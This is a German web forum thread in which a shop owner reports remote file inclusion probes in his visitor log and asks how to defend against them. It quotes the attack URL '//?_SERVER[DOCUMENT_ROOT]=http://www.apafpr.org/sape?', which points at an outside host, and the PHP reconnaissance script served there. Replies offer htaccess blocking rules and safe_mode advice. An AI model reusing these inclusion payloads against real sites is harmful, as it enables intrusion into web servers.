Ich habe gerade in "Wer ist online" selsame Besuche bzw. Aufrufe gehabt.

Kennt das jemand?
Wollen die etwas installieren?

''>ZITAT</div>00:04:28 0 Guest 66.249.16.212 18:29:56 18:29:56 /
00:05:24 0 Guest 213.198.76.196 18:29:00 18:29:00 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:06:26 0 Guest 93.90.176.25 18:27:58 18:27:58 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:13:31 0 Guest 66.249.65.1 18:20:53 18:20:53 /index.php [/b]

Habe die Adresse mal aufgerufen, da steht dann folgendes:

<?
#####[ MCN ]#####
$os = @PHP_OS;
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {$mode = 'ON';} else {$mode = 'OFF';}

#####[ ECHO ]#####
echo 'MCN'.$mode.'';
echo '
MCN: '.$os.'
';

exit;
#####[ END ]#####


Sieht für mich etwas dubios aus!

Bei whois steht dazu folgendes:

''>ZITAT</div>
IP Information for 93.90.176.25
IP Location: Germany Germany Dortmund Dogado Internet Gmbh
Resolve Host: web21.dogado.de
IP Address: 93.90.176.25 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
SSL Cert: confixx SSL Certificate has expired.
Reverse IP: 166 other sites hosted on this server.
Blacklist Status: Clear
Whois Record

OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: P.O. Box 10096
City: Amsterdam
StateProv:
PostalCode: 1001EB
Country: NL

ReferralServer: whois://whois.ripe.net:43

NetRange: 93.0.0.0 - 93.255.255.255
CIDR: 93.0.0.0/8
NetName: 93-RIPE
NetHandle: NET-93-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: SNS-PB.ISC.ORG
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
NameServer: NS2.LACNIC.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at http://www.ripe.net/whois (http://anonym.to/?http://www.ripe.net/whois)
RegDate: 2007-03-27
Updated: 2009-05-18

== Additional Information From whois://whois.ripe.net:43 ==

inetnum: 93.90.176.0 - 93.90.183.255
netname: providerbox
descr: dogado Internet GmbH
country: DE
admin-c: PBH-RIPE
tech-c: PBH-RIPE
status: ASSIGNED PA
mnt-by: providerbox-mnt
source: RIPE # Filtered

role: provider.BOX Hostmaster
address: dogado Internet GmbH
address: Saarlandstrasse 25
address: D-44139 Dortmund
e-mail:
admin-c: RTD-RIPE
admin-c: TMD-RIPE
tech-c: RTD-RIPE
tech-c: TMD-RIPE
mnt-by: providerbox-mnt
nic-hdl: PBH-RIPE
source: RIPE # Filtered

route: 93.90.176.0/24
descr: dogado Internet GmbH
origin: AS45031
mnt-by: providerbox-mnt
source: RIPE # Filtered
[/b]

und noch

''>ZITAT</div>
IP Information for 213.198.76.196
IP Location: Germany Germany Frankfurt Verio De Frankfurt Facility
Resolve Host: eul0300330-pip.eu.verio.net
IP Address: 213.198.76.196 [Whois] [Reverse-Ip] [Ping] [DNS Lookup] [Traceroute]
Blacklist Status: Clear
Whois Record

inetnum: 213.198.76.192 - 213.198.76.255
netname: VERIO-DE-INFRA
descr: VERIO DE frankfurt facility
country: DE
admin-c: VERA1-RIPE
tech-c: VIa6-RIPE
status: ASSIGNED PA
remarks: INFRA-AW
remarks: Abuse/UCE:
remarks: Network:
remarks: Security issues:
mnt-by: MAINT-VIPAR
source: RIPE # Filtered

role: Verio Europe Role Account
address: Verio UK
address: Devon House
address: 58 - 60 St. Katharine's Way, 1st Floor
address: London EW1 1LB
address: United Kingdom
phone: +44 20 7767 3700
fax-no: +44 20 7767 3701
remarks: trouble: network:
remarks: trouble: Abuse/UCE:
remarks: trouble: Security issues:
admin-c: VIa6-RIPE
tech-c: VIa6-RIPE
nic-hdl: VERA1-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:

role: Verio IP addressing
address: 8005 s. chester street
address: suite 200
address: englewood, CO 80112
address: United States
phone: +1 303 645-1900
remarks: trouble: Abuse/UCE:
remarks: trouble: Network:
remarks: trouble: Security issues:
admin-c: TG7672-RIPE
tech-c: TG7672-RIPE
tech-c: TF377-RIPE
tech-c: KP1186-RIPE
tech-c: LP508-RIPE
nic-hdl: VIa6-RIPE
mnt-by: MAINT-VIPAR
source: RIPE # Filtered
abuse-mailbox:
[/b]

Wobei die obere Adresse wohl die gleiche ist wie "whois".

Kennt die jemand?

Grüße Daniel

Ich habe gerade in "Wer ist online" selsame Besuche bzw. Aufrufe gehabt.

Kennt das jemand?
Wollen die etwas installieren?

[quote]00:04:28 0 Guest 66.249.16.212 18:29:56 18:29:56 /
00:05:24 0 Guest 213.198.76.196 18:29:00 18:29:00 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:06:26 0 Guest 93.90.176.25 18:27:58 18:27:58 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:13:31 0 Guest 66.249.65.1 18:20:53 18:20:53 /index.php

Habe die Adresse mal aufgerufen, da steht dann folgendes:

<?
#####[ MCN ]#####
$os = @PHP_OS;
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {$mode = 'ON';} else {$mode = 'OFF';}

#####[ ECHO ]#####
echo 'MCN'.$mode.'';
echo '
MCN: '.$os.'
';

exit;
#####[ END ]#####


Da möchte anscheinend gern mehr über deine PHP Umgebung die du fährst wissen, und ob safe_mode an oder aus ist. Nichts ungewöhliches. Wenn der/die Informationen erhalten sollten und postitiv für einen Hack sind, wirds ungemütlich.

jay-ar

Ich habe gerade in "Wer ist online" selsame Besuche bzw. Aufrufe gehabt.

Kennt das jemand?
Wollen die etwas installieren?

[quote]00:04:28 0 Guest 66.249.16.212 18:29:56 18:29:56 /
00:05:24 0 Guest 213.198.76.196 18:29:00 18:29:00 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:06:26 0 Guest 93.90.176.25 18:27:58 18:27:58 //?_SERVER[DOCUMENT_ROOT]=http://www.apafpr.org/sape?%0D?
00:13:31 0 Guest 66.249.65.1 18:20:53 18:20:53 /index.php

Habe die Adresse mal aufgerufen, da steht dann folgendes:

<?
#####[ MCN ]#####
$os = @PHP_OS;
if (@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on') {$mode = 'ON';} else {$mode = 'OFF';}

#####[ ECHO ]#####
echo 'MCN'.$mode.'';
echo '
MCN: '.$os.'
';

exit;
#####[ END ]#####


Da möchte anscheinend gern mehr über deine PHP Umgebung die du fährst wissen, und ob safe_mode an oder aus ist. Nichts ungewöhliches. Wenn der/die Informationen erhalten sollten und postitiv für einen Hack sind, wirds ungemütlich.

jay-ar



Hab jetzt grad mal bei meinem Provider nachgesehen, da steht, dass der safe_mode auf "off" geschaltet ist!

Was kann ich selber zur Absicherung machen?
Geht da etwas mit einer Umleitung per htaccess?

Daniel

schau mal hier:
http://www.ecombase.de/forum/index.php?sho...c=47513&hl= (http://www.ecombase.de/forum/index.php?showtopic=47513&hl=)

passe das für deine zwecke an und schliesse die freunde aus.

''>ZITAT</div>Hab jetzt grad mal bei meinem Provider nachgesehen, da steht, dass der safe_mode auf "off" geschaltet ist!

Was kann ich selber zur Absicherung machen?
Geht da etwas mit einer Umleitung per htaccess?

Daniel
[/b]
Normalerweise akzeptiert der Shop diese Art von Aufruf nicht, porbier es aus. Wer es besser weiß, bitte hier freundlicherweise posten.

Wenn PHP nicht als CGI läuft sollte das flag abschaltber sein. in der .htaccess dann
php_admin_flag safe_mode on

Ich weiss nicht wie Dein Provider die vhost und Datei/Verzeichnisberechtigungen händelt. Danach kann es sein, dass ua. Import/Exportmodule, FTP upload oder wenn es ganz krass kommt der Shop nicht mehr
funktionieren, da die Berechtigungen fehlen.

Bitte, bitte, nicht danach als Lösung versuchen Berechtigungen auf 777 zu stellen, wie hier manchmal zu lesen ist. Das ist wie In Urlaub fahren und den Haustürschlüssel an den Briefkasten hängen. Frage Deinen Provider, ob er das abstellen kann.

jay-ar

''>ZITAT(Lili @ Sep 18 2009, 0:20) 195135
schau mal hier:
http://www.ecombase.de/forum/index.php?sho...c=47513&hl= (http://www.ecombase.de/forum/index.php?showtopic=47513&hl=)

passe das für deine zwecke an und schliesse die freunde aus.
[/b]


Hallo Lili,

Danke erst mal.

Was soll ich denn da am besten vor die =http:// stellen, nicht dass ich mir da selber den Weg abschneide. Ob da _ROOT] oder [DOCUMENT_ROOT] das richtige sind? :smiley_emoticons_irre:
RewriteCond %{QUERY_STRING} ^(. )_ROOT]=http://(. )$ [NC]
RewriteRule ^. - [F]


Dann noch die 2te Frage:
Was meinst Du mit 403 Seite anpassen?

Grüße Daniel

''>ZITAT(Hooter @ Sep 18 2009, 8:26) 195158
Hallo Lili,

Danke erst mal.

Was soll ich denn da am besten vor die =http:// stellen, nicht dass ich mir da selber den Weg abschneide. Ob da _ROOT] oder [DOCUMENT_ROOT] das richtige sind? :smiley_emoticons_irre:
RewriteCond %{QUERY_STRING} ^(. )_ROOT]=http://(. )$ [NC]
RewriteRule ^. - [F]


Dann noch die 2te Frage:
Was meinst Du mit 403 Seite anpassen?

Grüße Daniel
[/b]

1. ich hätte nur diesen teil genommen: //?_
RewriteCond %{QUERY_STRING} ^(. )//?_(. )$ [NC]
RewriteRule ^. - [F]
Aber auch wenn es vielleicht so aussah, ich bin kein htaccess experte, sondern habe mir die "idee" auch zusammengegoogle't. also einfach ausprobieren...

2. man muss die 403 nicht unbedingt anpassen, wenn dein provider da schon was bereitstellt. meist wird eh automatisch ausgegeben: verboten... blabla

''>ZITAT(Lili @ Sep 18 2009, 8:46) 195159
''>ZITAT(Hooter @ Sep 18 2009, 8:26) 195158[/snapback]
Hallo Lili,

Danke erst mal.

Was soll ich denn da am besten vor die =http:// stellen, nicht dass ich mir da selber den Weg abschneide. Ob da _ROOT] oder [DOCUMENT_ROOT] das richtige sind? :smiley_emoticons_irre:
RewriteCond %{QUERY_STRING} ^(. )_ROOT]=http://(. )$ [NC]
RewriteRule ^. - [F]


Dann noch die 2te Frage:
Was meinst Du mit 403 Seite anpassen?

Grüße Daniel
[/b]

1. ich hätte nur diesen teil genommen: //?_
RewriteCond %{QUERY_STRING} ^(. )//?_(. )$ [NC]
RewriteRule ^. - [F]
Aber auch wenn es vielleicht so aussah, ich bin kein htaccess experte, sondern habe mir die "idee" auch zusammengegoogle't. also einfach ausprobieren...

2. man muss die 403 nicht unbedingt anpassen, wenn dein provider da schon was bereitstellt. meist wird eh automatisch ausgegeben: verboten... blabla
[/b][/quote]

Hallo Lili,

hab's jetzt mal so gemacht, wie Du's gemeint hast.
Mal sehen, ob da nochmal etwas kommt!

''>ZITAT(jay-ar @ Sep 18 2009, 1:22) 195144
''>ZITATHab jetzt grad mal bei meinem Provider nachgesehen, da steht, dass der safe_mode auf "off" geschaltet ist!

Was kann ich selber zur Absicherung machen?
Geht da etwas mit einer Umleitung per htaccess?

Daniel
[/b]
Normalerweise akzeptiert der Shop diese Art von Aufruf nicht, porbier es aus. Wer es besser weiß, bitte hier freundlicherweise posten.

Wenn PHP nicht als CGI läuft sollte das flag abschaltber sein. in der .htaccess dann
php_admin_flag safe_mode on

Ich weiss nicht wie Dein Provider die vhost und Datei/Verzeichnisberechtigungen händelt. Danach kann es sein, dass ua. Import/Exportmodule, FTP upload oder wenn es ganz krass kommt der Shop nicht mehr
funktionieren, da die Berechtigungen fehlen.

Bitte, bitte, nicht danach als Lösung versuchen Berechtigungen auf 777 zu stellen, wie hier manchmal zu lesen ist. Das ist wie In Urlaub fahren und den Haustürschlüssel an den Briefkasten hängen. Frage Deinen Provider, ob er das abstellen kann.

jay-ar
[/b][/quote]

Hallo jay-ar,

hab das in der Konfiguration gefunden.
'--enable-force-cgi-redirect'
Wenn ich das richtig verstanden habe, kann dann kein Aufruf von PHP stattfinden.
Der HTTP Server ist ein Apache.


''>ZITAT</div>--enable-force-cgi-redirect benutzen

Diese beim Kompilieren verwendete Option verhindert grundsätzlich den Aufruf von PHP mit einer URL wie http://my.host/cgi-bin/php/secretdir/script.php (http://anonym.to/?http://my.host/cgi-bin/php/secretdir/script.php). Stattdessen parst PHP in diesem Modus nur dann, wenn der Aufruf durch einen korrekten Redirect des Webservers erfolgte.

Normalerweise wird der Redirect in der Apache-Konfiguration mit den folgenden Einträgen festgelegt:

Action php-script /cgi-bin/php
AddHandler php-script .php

Diese Option wurde nur mit dem Apache Webserver getestet und ist abhängig davon, wie Apache die nicht standardmäßige CGI-Umgebungsvariable REDIRECT_STATUS bei Redirect-Anfragen setzt. Sollte Ihr Webserver keine Möglichkeit unterstützen, zu übermitteln, ob es sich um einen direkte Aufruf oder einen Redirect handelt, können Sie diese Option nicht verwenden und müssen einen der anderen hier beschriebenen Wege gehen, die CGI-Version zu nutzen. [/b]

Wenn ich falsch liege, bitte berichtigen.

Daniel